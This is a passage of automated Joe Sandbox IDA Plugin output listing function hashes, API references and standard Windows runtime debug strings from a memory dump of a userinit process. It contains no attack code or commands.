                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: 81aa4113055f6fd73611976f72a0beaa660521e2a9f1fc75f7fd9965e6d69fc9
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: CD81B074E052499EDF28CE68C8917FEBBB6AF85360F1C465ED861EB391C7349940CB90
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                • Instruction ID: c77a6a8f46bdf1bda3bb73797f9e6630be9ddea1ad5cd2ef26b0b555191f1bdc
                                                                • Opcode Fuzzy Hash: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                • Instruction Fuzzy Hash: D421887AE00219ABDB10EF79CC44AFEBBFDEF58644F180516E915E7201E730DA059BA1
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037A02BD
                                                                • RTL: Re-Waiting, xrefs: 037A031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037A02E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 037A7BAC
                                                                • RTL: Resource at %p, xrefs: 037A7B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 037A7B7F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037A728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 037A72C1
                                                                • RTL: Resource at %p, xrefs: 037A72A3
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 037A7294
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                APIs
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 037BCFBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                • Associated: 00000009.00000002.3906544374.0000000003829000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000382D000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3700000_userinit.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8
                                                                • String ID: @$@4Qw@4Qw
                                                                • API String ID: 4062629308-2383119779